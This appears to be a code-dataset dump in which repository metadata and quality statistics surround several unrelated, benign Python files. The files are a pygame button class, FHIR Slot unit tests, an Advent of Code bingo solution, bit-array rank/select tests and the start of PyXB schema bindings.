| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4cc42f4d3eb0ac511b8c5580d7d1e3f0eac8ade1
| 41
|
py
|
Python
|
Example/third_party_code/foo.py
|
phueb/LudwigCluster
|
1c1f8cdb26031a9ed78232482cfa1e4fe9e36256
|
[
"MIT"
] | null | null | null |
Example/third_party_code/foo.py
|
phueb/LudwigCluster
|
1c1f8cdb26031a9ed78232482cfa1e4fe9e36256
|
[
"MIT"
] | 1
|
2022-03-30T14:07:13.000Z
|
2022-03-30T14:07:13.000Z
|
Example/third_party_code/foo.py
|
phueb/LudwigCluster
|
1c1f8cdb26031a9ed78232482cfa1e4fe9e36256
|
[
"MIT"
] | 2
|
2020-06-15T13:06:53.000Z
|
2021-02-12T00:33:29.000Z
|
def bar():
return 'Just an example'
| 10.25
| 28
| 0.609756
| 6
| 41
| 4.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.268293
| 41
| 3
| 29
| 13.666667
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0.375
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
98072352328ff4ca09f9499b24c2ce540efb4c5a
| 1,130
|
py
|
Python
|
modules.py
|
gameme10/PyPet
|
f13e8a386def0b721154f3d1b171027d6d38dce4
|
[
"MIT"
] | null | null | null |
modules.py
|
gameme10/PyPet
|
f13e8a386def0b721154f3d1b171027d6d38dce4
|
[
"MIT"
] | 1
|
2021-09-26T13:14:07.000Z
|
2021-09-26T13:14:07.000Z
|
modules.py
|
gameme10/PyPet
|
f13e8a386def0b721154f3d1b171027d6d38dce4
|
[
"MIT"
] | 1
|
2022-01-18T19:36:10.000Z
|
2022-01-18T19:36:10.000Z
|
class Button():
extras = None
def display(self):
if self.extras[0][0]/self.extras[1][0] <= self.extras[2].mouse.get_pos()[0] <= self.extras[0][0]/self.extras[1][0]+140 and self.extras[0][1]/self.extras[1][1] <= self.extras[2].mouse.get_pos()[1] <= self.extras[0][1]/self.extras[1][1]+40:
self.extras[2].draw.rect(self.extras[3],self.extras[5],[self.extras[0][0]/self.extras[1][0],self.extras[0][1]/self.extras[1][0],140,40])
else:
self.extras[2].draw.rect(self.extras[3],self.extras[4],[self.extras[0][0]/self.extras[1][0],self.extras[0][1]/self.extras[1][0],140,40])
self.extras[3].blit(self.extras[6].render(self.extras[8] , True , self.extras[7]) , (self.extras[0][0]/10+20,self.extras[0][1]/10+5))
def isClicked(self, event):
if event.type == self.extras[2].MOUSEBUTTONDOWN:
if self.extras[0][0]/self.extras[1][0] <= self.extras[2].mouse.get_pos()[0] <= self.extras[0][0]/self.extras[1][0]+140 and self.extras[0][1]/self.extras[1][1] <= self.extras[2].mouse.get_pos()[1] <= self.extras[0][1]/self.extras[1][1]+40:
return True
| 86.923077
| 250
| 0.612389
| 206
| 1,130
| 3.339806
| 0.174757
| 0.59593
| 0.223837
| 0.139535
| 0.712209
| 0.712209
| 0.712209
| 0.712209
| 0.712209
| 0.712209
| 0
| 0.1
| 0.132743
| 1,130
| 13
| 251
| 86.923077
| 0.602041
| 0
| 0
| 0.166667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0
| 0
| 0.416667
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
98181c57a789b69e62faf42abcbb6214de73ebc9
| 8,780
|
py
|
Python
|
fhir/resources/tests/test_slot.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/tests/test_slot.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
fhir/resources/tests/test_slot.py
|
mmabey/fhir.resources
|
cc73718e9762c04726cd7de240c8f2dd5313cbe1
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Slot
Release: R4
Version: 4.0.1
Build ID: 9346c8cc45
Last updated: 2019-11-01T09:29:23.356+11:00
"""
import io
import json
import os
import unittest
import pytest
from .. import slot
from ..fhirdate import FHIRDate
from .fixtures import force_bytes
@pytest.mark.usefixtures("base_settings")
class SlotTests(unittest.TestCase):
def instantiate_from(self, filename):
datadir = os.environ.get("FHIR_UNITTEST_DATADIR") or ""
with io.open(os.path.join(datadir, filename), "r", encoding="utf-8") as handle:
js = json.load(handle)
self.assertEqual("Slot", js["resourceType"])
return slot.Slot(js)
def testSlot1(self):
inst = self.instantiate_from("slot-example-busy.json")
self.assertIsNotNone(inst, "Must have instantiated a Slot instance")
self.implSlot1(inst)
js = inst.as_json()
self.assertEqual("Slot", js["resourceType"])
inst2 = slot.Slot(js)
self.implSlot1(inst2)
def implSlot1(self, inst):
self.assertEqual(
force_bytes(inst.comment),
force_bytes(
"Assessments should be performed before requesting appointments in this slot."
),
)
self.assertEqual(inst.end.date, FHIRDate("2013-12-25T09:15:00Z").date)
self.assertEqual(inst.end.as_json(), "2013-12-25T09:15:00Z")
self.assertEqual(force_bytes(inst.id), force_bytes("1"))
self.assertEqual(
force_bytes(inst.identifier[0].system),
force_bytes("http://example.org/identifiers/slots"),
)
self.assertEqual(force_bytes(inst.identifier[0].value), force_bytes("123132"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertTrue(inst.overbooked)
self.assertEqual(
force_bytes(inst.serviceCategory[0].coding[0].code), force_bytes("17")
)
self.assertEqual(
force_bytes(inst.serviceCategory[0].coding[0].display),
force_bytes("General Practice"),
)
self.assertEqual(inst.start.date, FHIRDate("2013-12-25T09:00:00Z").date)
self.assertEqual(inst.start.as_json(), "2013-12-25T09:00:00Z")
self.assertEqual(force_bytes(inst.status), force_bytes("busy"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
def testSlot2(self):
inst = self.instantiate_from("slot-example.json")
self.assertIsNotNone(inst, "Must have instantiated a Slot instance")
self.implSlot2(inst)
js = inst.as_json()
self.assertEqual("Slot", js["resourceType"])
inst2 = slot.Slot(js)
self.implSlot2(inst2)
def implSlot2(self, inst):
self.assertEqual(
force_bytes(inst.appointmentType.coding[0].code), force_bytes("WALKIN")
)
self.assertEqual(
force_bytes(inst.appointmentType.coding[0].display),
force_bytes("A previously unscheduled walk-in visit"),
)
self.assertEqual(
force_bytes(inst.appointmentType.coding[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v2-0276"),
)
self.assertEqual(
force_bytes(inst.comment),
force_bytes(
"Assessments should be performed before requesting appointments in this slot."
),
)
self.assertEqual(inst.end.date, FHIRDate("2013-12-25T09:30:00Z").date)
self.assertEqual(inst.end.as_json(), "2013-12-25T09:30:00Z")
self.assertEqual(force_bytes(inst.id), force_bytes("example"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.serviceCategory[0].coding[0].code), force_bytes("17")
)
self.assertEqual(
force_bytes(inst.serviceCategory[0].coding[0].display),
force_bytes("General Practice"),
)
self.assertEqual(
force_bytes(inst.serviceType[0].coding[0].code), force_bytes("57")
)
self.assertEqual(
force_bytes(inst.serviceType[0].coding[0].display),
force_bytes("Immunization"),
)
self.assertEqual(
force_bytes(inst.specialty[0].coding[0].code), force_bytes("408480009")
)
self.assertEqual(
force_bytes(inst.specialty[0].coding[0].display),
force_bytes("Clinical immunology"),
)
self.assertEqual(inst.start.date, FHIRDate("2013-12-25T09:15:00Z").date)
self.assertEqual(inst.start.as_json(), "2013-12-25T09:15:00Z")
self.assertEqual(force_bytes(inst.status), force_bytes("free"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
def testSlot3(self):
inst = self.instantiate_from("slot-example-unavailable.json")
self.assertIsNotNone(inst, "Must have instantiated a Slot instance")
self.implSlot3(inst)
js = inst.as_json()
self.assertEqual("Slot", js["resourceType"])
inst2 = slot.Slot(js)
self.implSlot3(inst2)
def implSlot3(self, inst):
self.assertEqual(
force_bytes(inst.comment), force_bytes("Dr Careful is out of the office")
)
self.assertEqual(inst.end.date, FHIRDate("2013-12-25T09:45:00Z").date)
self.assertEqual(inst.end.as_json(), "2013-12-25T09:45:00Z")
self.assertEqual(force_bytes(inst.id), force_bytes("3"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.serviceCategory[0].coding[0].code), force_bytes("17")
)
self.assertEqual(
force_bytes(inst.serviceCategory[0].coding[0].display),
force_bytes("General Practice"),
)
self.assertEqual(inst.start.date, FHIRDate("2013-12-25T09:30:00Z").date)
self.assertEqual(inst.start.as_json(), "2013-12-25T09:30:00Z")
self.assertEqual(force_bytes(inst.status), force_bytes("busy-unavailable"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
def testSlot4(self):
inst = self.instantiate_from("slot-example-tentative.json")
self.assertIsNotNone(inst, "Must have instantiated a Slot instance")
self.implSlot4(inst)
js = inst.as_json()
self.assertEqual("Slot", js["resourceType"])
inst2 = slot.Slot(js)
self.implSlot4(inst2)
def implSlot4(self, inst):
self.assertEqual(
force_bytes(inst.comment), force_bytes("Dr Careful is out of the office")
)
self.assertEqual(inst.end.date, FHIRDate("2013-12-25T10:00:00Z").date)
self.assertEqual(inst.end.as_json(), "2013-12-25T10:00:00Z")
self.assertEqual(force_bytes(inst.id), force_bytes("2"))
self.assertEqual(force_bytes(inst.meta.tag[0].code), force_bytes("HTEST"))
self.assertEqual(
force_bytes(inst.meta.tag[0].display), force_bytes("test health data")
)
self.assertEqual(
force_bytes(inst.meta.tag[0].system),
force_bytes("http://terminology.hl7.org/CodeSystem/v3-ActReason"),
)
self.assertEqual(
force_bytes(inst.serviceCategory[0].coding[0].code), force_bytes("17")
)
self.assertEqual(
force_bytes(inst.serviceCategory[0].coding[0].display),
force_bytes("General Practice"),
)
self.assertEqual(inst.start.date, FHIRDate("2013-12-25T09:45:00Z").date)
self.assertEqual(inst.start.as_json(), "2013-12-25T09:45:00Z")
self.assertEqual(force_bytes(inst.status), force_bytes("busy-tentative"))
self.assertEqual(force_bytes(inst.text.status), force_bytes("generated"))
| 40.837209
| 94
| 0.631663
| 1,049
| 8,780
| 5.181125
| 0.152526
| 0.167433
| 0.165593
| 0.206992
| 0.842134
| 0.824839
| 0.812695
| 0.767801
| 0.739834
| 0.677093
| 0
| 0.054086
| 0.229271
| 8,780
| 214
| 95
| 41.028037
| 0.749076
| 0.019134
| 0
| 0.460317
| 0
| 0
| 0.175965
| 0.011506
| 0
| 0
| 0
| 0
| 0.375661
| 1
| 0.047619
| false
| 0
| 0.042328
| 0
| 0.100529
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e22100f9a91b09b5eec49cc39b22e11da5badebc
| 921
|
py
|
Python
|
utils/load_twitter_file_and_save_igraph_file.py
|
mordor-ai/M1MIASHS_projet_twitter
|
d03b2478ac50289e7f6a1c8c83a47df9d3f90467
|
[
"MIT"
] | null | null | null |
utils/load_twitter_file_and_save_igraph_file.py
|
mordor-ai/M1MIASHS_projet_twitter
|
d03b2478ac50289e7f6a1c8c83a47df9d3f90467
|
[
"MIT"
] | null | null | null |
utils/load_twitter_file_and_save_igraph_file.py
|
mordor-ai/M1MIASHS_projet_twitter
|
d03b2478ac50289e7f6a1c8c83a47df9d3f90467
|
[
"MIT"
] | null | null | null |
import utils as u
e_filename_csv = "../files/twitter_100M.csv"
n_filename_csv = "../files/twitter-2010-ids.csv"
folder_out = "../files/pickle/"
u.load_twitter_and_save_pickle_graph (e_filename_csv, n_filename_csv, 100, True, out_folder=folder_out)
u.load_twitter_and_save_pickle_graph (e_filename_csv, n_filename_csv, 1000, True, out_folder=folder_out)
u.load_twitter_and_save_pickle_graph (e_filename_csv, n_filename_csv, 10000, True, out_folder=folder_out)
# u.load_twitter_and_save_pickle_graph(e_filename_csv,n_filename_csv,100000,True,out_folder=folder_out)
# u.load_twitter_and_save_pickle_graph(e_filename_csv,n_filename_csv,1000000,True,out_folder=folder_out)
# u.load_twitter_and_save_pickle_graph(e_filename_csv,n_filename_csv,10000000,True,out_folder=folder_out)
# u.load_twitter_and_save_pickle_graph (e_filename_csv, n_filename_csv, 10, True, out_folder=folder_out)
print ("====== End of program =======")
| 61.4
| 105
| 0.831705
| 160
| 921
| 4.26875
| 0.2
| 0.257687
| 0.140556
| 0.175695
| 0.778917
| 0.746706
| 0.746706
| 0.746706
| 0.746706
| 0.746706
| 0
| 0.048331
| 0.05646
| 921
| 14
| 106
| 65.785714
| 0.737629
| 0.446254
| 0
| 0
| 0
| 0
| 0.19604
| 0.106931
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.125
| 0
| 0.125
| 0.125
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e22e7efa0aead15d09259dfcf18a84949eb201df
| 3,434
|
py
|
Python
|
2021/day04.py
|
valogonor/advent-of-code
|
146b25094870f4812a001d1573ed302514f5d4b5
|
[
"MIT"
] | 1
|
2021-12-08T01:08:13.000Z
|
2021-12-08T01:08:13.000Z
|
2021/day04.py
|
valogonor/advent-of-code
|
146b25094870f4812a001d1573ed302514f5d4b5
|
[
"MIT"
] | null | null | null |
2021/day04.py
|
valogonor/advent-of-code
|
146b25094870f4812a001d1573ed302514f5d4b5
|
[
"MIT"
] | null | null | null |
import sys
sys.stdout = open('output.txt', 'w')
sys.stdin = open('input.txt')
# Part One
nums = list(map(int, input().split(',')))
boards = []
d = {i: {'row': {j: [] for j in range(5)}, 'col': {j: [] for j in range(5)}} for i in range(100)}
for _ in range(100):
board = []
for _ in range(6):
row = list(map(int, input().split()))
if row:
board.append(row)
boards.append(board)
for num in nums:
for i in range(100):
for j in range(5):
for k in range(5):
if boards[i][j][k] == num:
d[i]['row'][j].append(num)
d[i]['col'][k].append(num)
if len(d[i]['row'][j]) == 5:
sm = 0
for row in boards[i]:
print(row)
sm += sum(row)
for l in range(5):
for n in d[i]['row'][l]:
sm -= n
print(num, sm, num*sm, d[i])
exit()
if len(d[i]['col'][k]) == 5:
sm = 0
for row in boards[i]:
print(row)
sm += sum(row)
for l in range(5):
for n in d[i]['col'][l]:
sm -= n
print(num, sm, num*sm, d[i])
exit()
# Part Two
nums = list(map(int, input().split(',')))
boards = []
d = {i: {'row': {j: [] for j in range(5)}, 'col': {j: [] for j in range(5)}} for i in range(100)}
unseen = set(range(100))
for _ in range(100):
board = []
for _ in range(6):
row = list(map(int, input().split()))
if row:
board.append(row)
boards.append(board)
for num in nums:
for i in range(100):
for j in range(5):
for k in range(5):
if boards[i][j][k] == num:
d[i]['row'][j].append(num)
d[i]['col'][k].append(num)
if len(d[i]['row'][j]) == 5:
if len(unseen) > 1:
if i in unseen:
unseen.remove(i)
elif i in unseen:
sm = 0
for row in boards[i]:
sm += sum(row)
print(row)
for l in range(5):
for n in d[i]['row'][l]:
sm -= n
print(num, sm, num*sm, nums.index(num), d[i])
exit()
if len(d[i]['col'][k]) == 5:
if len(unseen) > 1:
if i in unseen:
unseen.remove(i)
elif i in unseen:
sm = 0
for row in boards[i]:
sm += sum(row)
print(row)
for l in range(5):
for n in d[i]['col'][l]:
sm -= n
print(num, sm, num*sm, nums.index(num), d[i])
exit()
| 37.326087
| 97
| 0.321782
| 397
| 3,434
| 2.7733
| 0.120907
| 0.127157
| 0.087193
| 0.079927
| 0.93188
| 0.93188
| 0.93188
| 0.93188
| 0.93188
| 0.93188
| 0
| 0.028644
| 0.542516
| 3,434
| 91
| 98
| 37.736264
| 0.672183
| 0.004951
| 0
| 0.953488
| 0
| 0
| 0.020504
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.011628
| 0
| 0.011628
| 0.093023
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e2480dd129b05371703882723aecb89ee717ec12
| 8,254
|
py
|
Python
|
tests/test_compressed_runs_bit_array.py
|
miiohio/succinct
|
c5adc7b409264d027e4ea97d18d809f39434861f
|
[
"MIT"
] | 56
|
2020-07-09T23:32:12.000Z
|
2022-02-09T15:16:22.000Z
|
tests/test_compressed_runs_bit_array.py
|
miiohio/succinct
|
c5adc7b409264d027e4ea97d18d809f39434861f
|
[
"MIT"
] | null | null | null |
tests/test_compressed_runs_bit_array.py
|
miiohio/succinct
|
c5adc7b409264d027e4ea97d18d809f39434861f
|
[
"MIT"
] | 5
|
2020-07-22T00:12:09.000Z
|
2021-05-27T08:12:50.000Z
|
from datetime import timedelta
from typing import List
from bitarray import bitarray
from hypothesis import assume, example, given, settings
from hypothesis import strategies as st
from succinct.compressed_runs_bit_array import CompressedRunsBitArray
def test_compressed_runs_bit_array_rank_example_1a() -> None:
bits = bitarray('00001111111100101111')
crba = CompressedRunsBitArray(bits)
assert crba.rank(0) == 0
assert crba.rank(1) == 0
assert crba.rank(2) == 0
assert crba.rank(3) == 0
assert crba.rank(4) == 1
assert crba.rank(5) == 2
assert crba.rank(6) == 3
assert crba.rank(7) == 4
assert crba.rank(8) == 5
assert crba.rank(9) == 6
assert crba.rank(10) == 7
assert crba.rank(11) == 8
assert crba.rank(12) == 8
assert crba.rank(13) == 8
assert crba.rank(14) == 9
assert crba.rank(15) == 9
assert crba.rank(16) == 10
assert crba.rank(17) == 11
assert crba.rank(18) == 12
assert crba.rank(19) == 13
def test_compressed_runs_bit_array_rank_example_1b() -> None:
bits = bitarray('11110000000011010000')
crba = CompressedRunsBitArray(bits)
assert crba.rank_zero(0) == 0
assert crba.rank_zero(1) == 0
assert crba.rank_zero(2) == 0
assert crba.rank_zero(3) == 0
assert crba.rank_zero(4) == 1
assert crba.rank_zero(5) == 2
assert crba.rank_zero(6) == 3
assert crba.rank_zero(7) == 4
assert crba.rank_zero(8) == 5
assert crba.rank_zero(9) == 6
assert crba.rank_zero(10) == 7
assert crba.rank_zero(11) == 8
assert crba.rank_zero(12) == 8
assert crba.rank_zero(13) == 8
assert crba.rank_zero(14) == 9
assert crba.rank_zero(15) == 9
assert crba.rank_zero(16) == 10
assert crba.rank_zero(17) == 11
assert crba.rank_zero(18) == 12
assert crba.rank_zero(19) == 13
def test_compressed_runs_bit_array_rank_example_2a() -> None:
bits = bitarray('100001111111100101111')
crba = CompressedRunsBitArray(bits)
assert crba.rank(0) == 1
assert crba.rank(1) == 1
assert crba.rank(2) == 1
assert crba.rank(3) == 1
assert crba.rank(4) == 1
assert crba.rank(5) == 2
assert crba.rank(6) == 3
assert crba.rank(7) == 4
assert crba.rank(8) == 5
assert crba.rank(9) == 6
assert crba.rank(10) == 7
assert crba.rank(11) == 8
assert crba.rank(12) == 9
assert crba.rank(13) == 9
assert crba.rank(14) == 9
assert crba.rank(15) == 10
assert crba.rank(16) == 10
assert crba.rank(17) == 11
assert crba.rank(18) == 12
assert crba.rank(19) == 13
assert crba.rank(20) == 14
def test_compressed_runs_bit_array_rank_example_2b() -> None:
bits = bitarray('011110000000011010000')
crba = CompressedRunsBitArray(bits)
assert crba.rank_zero(0) == 1
assert crba.rank_zero(1) == 1
assert crba.rank_zero(2) == 1
assert crba.rank_zero(3) == 1
assert crba.rank_zero(4) == 1
assert crba.rank_zero(5) == 2
assert crba.rank_zero(6) == 3
assert crba.rank_zero(7) == 4
assert crba.rank_zero(8) == 5
assert crba.rank_zero(9) == 6
assert crba.rank_zero(10) == 7
assert crba.rank_zero(11) == 8
assert crba.rank_zero(12) == 9
assert crba.rank_zero(13) == 9
assert crba.rank_zero(14) == 9
assert crba.rank_zero(15) == 10
assert crba.rank_zero(16) == 10
assert crba.rank_zero(17) == 11
assert crba.rank_zero(18) == 12
assert crba.rank_zero(19) == 13
assert crba.rank_zero(20) == 14
def test_compressed_runs_bit_array_select_example_1a() -> None:
bits = bitarray('00001111111100101111')
crba = CompressedRunsBitArray(bits)
assert crba.select(0) == 4
assert crba.select(1) == 5
assert crba.select(2) == 6
assert crba.select(3) == 7
assert crba.select(4) == 8
assert crba.select(5) == 9
assert crba.select(6) == 10
assert crba.select(7) == 11
assert crba.select(8) == 14
assert crba.select(9) == 16
assert crba.select(10) == 17
assert crba.select(11) == 18
assert crba.select(12) == 19
def test_compressed_runs_bit_array_select_example_1b() -> None:
bits = bitarray('11110000000011010000')
crba = CompressedRunsBitArray(bits)
assert crba.select_zero(0) == 4
assert crba.select_zero(1) == 5
assert crba.select_zero(2) == 6
assert crba.select_zero(3) == 7
assert crba.select_zero(4) == 8
assert crba.select_zero(5) == 9
assert crba.select_zero(6) == 10
assert crba.select_zero(7) == 11
assert crba.select_zero(8) == 14
assert crba.select_zero(9) == 16
assert crba.select_zero(10) == 17
assert crba.select_zero(11) == 18
assert crba.select_zero(12) == 19
def test_compressed_runs_bit_array_select_example_2a() -> None:
bits = bitarray('100001111111100101111')
crba = CompressedRunsBitArray(bits)
assert crba.select(0) == 0
assert crba.select(1) == 5
assert crba.select(2) == 6
assert crba.select(3) == 7
assert crba.select(4) == 8
assert crba.select(5) == 9
assert crba.select(6) == 10
assert crba.select(7) == 11
assert crba.select(8) == 12
assert crba.select(9) == 15
assert crba.select(10) == 17
assert crba.select(11) == 18
assert crba.select(12) == 19
assert crba.select(13) == 20
def test_compressed_runs_bit_array_select_example_2b() -> None:
bits = bitarray('011110000000011010000')
crba = CompressedRunsBitArray(bits)
assert crba.select_zero(0) == 0
assert crba.select_zero(1) == 5
assert crba.select_zero(2) == 6
assert crba.select_zero(3) == 7
assert crba.select_zero(4) == 8
assert crba.select_zero(5) == 9
assert crba.select_zero(6) == 10
assert crba.select_zero(7) == 11
assert crba.select_zero(8) == 12
assert crba.select_zero(9) == 15
assert crba.select_zero(10) == 17
assert crba.select_zero(11) == 18
assert crba.select_zero(12) == 19
assert crba.select_zero(13) == 20
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=None)
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_getitem(bb: bytes) -> None:
assume(len(bb) % 8 == 0)
bits = bitarray()
bits.frombytes(bb)
crba = CompressedRunsBitArray(bits)
for i in range(len(bits)):
assert crba[i] == bits[i]
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=timedelta(milliseconds=2000))
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_rank(bb: bytes) -> None:
assume(len(bb) % 8 == 0)
bits = bitarray()
bits.frombytes(bb)
crba = CompressedRunsBitArray(bits)
for i in range(len(bits)):
assert crba.rank(i) == sum(bits[0:(i + 1)])
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=timedelta(milliseconds=2000))
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_rank_zero(bb: bytes) -> None:
assume(len(bb) % 8 == 0)
bits = bitarray()
bits.frombytes(bb)
crba = CompressedRunsBitArray(bits)
for i in range(len(bits)):
assert crba.rank_zero(i) == sum(1 - int(b) for b in bits[0:(i + 1)])
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=timedelta(milliseconds=500))
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_select(bb: bytes) -> None:
assume(len(bb) % 8 == 0)
bits = bitarray()
bits.frombytes(bb)
crba = CompressedRunsBitArray(bits)
select_answers: List[int] = []
for i in range(len(bits)):
if bits[i]:
select_answers.append(i)
for i, pos in enumerate(select_answers):
assert crba.select(i) == pos
@given(st.binary(min_size=8, max_size=10000))
@settings(max_examples=1000, deadline=timedelta(milliseconds=2000))
@example(bb=bytes([42] * 136))
def test_compressed_runs_bit_array_select_zero(bb: bytes) -> None:
assume(len(bb) % 8 == 0)
bits = bitarray()
bits.frombytes(bb)
crba = CompressedRunsBitArray(bits)
select_zero_answers: List[int] = []
for i in range(len(bits)):
if not bits[i]:
select_zero_answers.append(i)
for i, pos in enumerate(select_zero_answers):
assert crba.select_zero(i) == pos
| 30.234432
| 76
| 0.656894
| 1,245
| 8,254
| 4.210442
| 0.072289
| 0.268981
| 0.224342
| 0.14422
| 0.93037
| 0.841473
| 0.841473
| 0.836894
| 0.801793
| 0.774704
| 0
| 0.099939
| 0.205961
| 8,254
| 272
| 77
| 30.345588
| 0.699878
| 0
| 0
| 0.651786
| 0
| 0
| 0.019869
| 0.010177
| 0
| 0
| 0
| 0
| 0.629464
| 1
| 0.058036
| false
| 0
| 0.026786
| 0
| 0.084821
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e255a6120e394fa20a70f26066608a45d90618dc
| 83,995
|
py
|
Python
|
darwinpush/xb/raw/sch.py
|
fasteroute/darwinpush
|
c919049e076cbdf61007fc9cc1c5a0271cde7929
|
[
"Apache-2.0"
] | 3
|
2015-08-15T15:38:06.000Z
|
2019-08-06T11:09:32.000Z
|
darwinpush/xb/raw/sch.py
|
grundleborg/darwinpush
|
c919049e076cbdf61007fc9cc1c5a0271cde7929
|
[
"Apache-2.0"
] | 34
|
2015-07-22T13:47:16.000Z
|
2015-08-12T17:40:23.000Z
|
darwinpush/xb/raw/sch.py
|
grundleborg/darwinpush
|
c919049e076cbdf61007fc9cc1c5a0271cde7929
|
[
"Apache-2.0"
] | 1
|
2015-08-30T15:26:24.000Z
|
2015-08-30T15:26:24.000Z
|
# ./darwinpush/xb/raw/sch.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:a4d0e93b3d986983d09f604844e6ca8969d2f70c
# Generated 2015-04-23 16:42:14.518511 by PyXB version 1.2.4 using Python 3.4.1.final.0
# Namespace http://www.thalesgroup.com/rtti/PushPort/Schedules/v1 [xmlns:sch]
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:5049f1de-e9cf-11e4-bb50-a0481ca50ab0')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
import darwinpush.xb.ct as _ImportedBinding_darwinpush_xb_ct
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://www.thalesgroup.com/rtti/PushPort/Schedules/v1', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
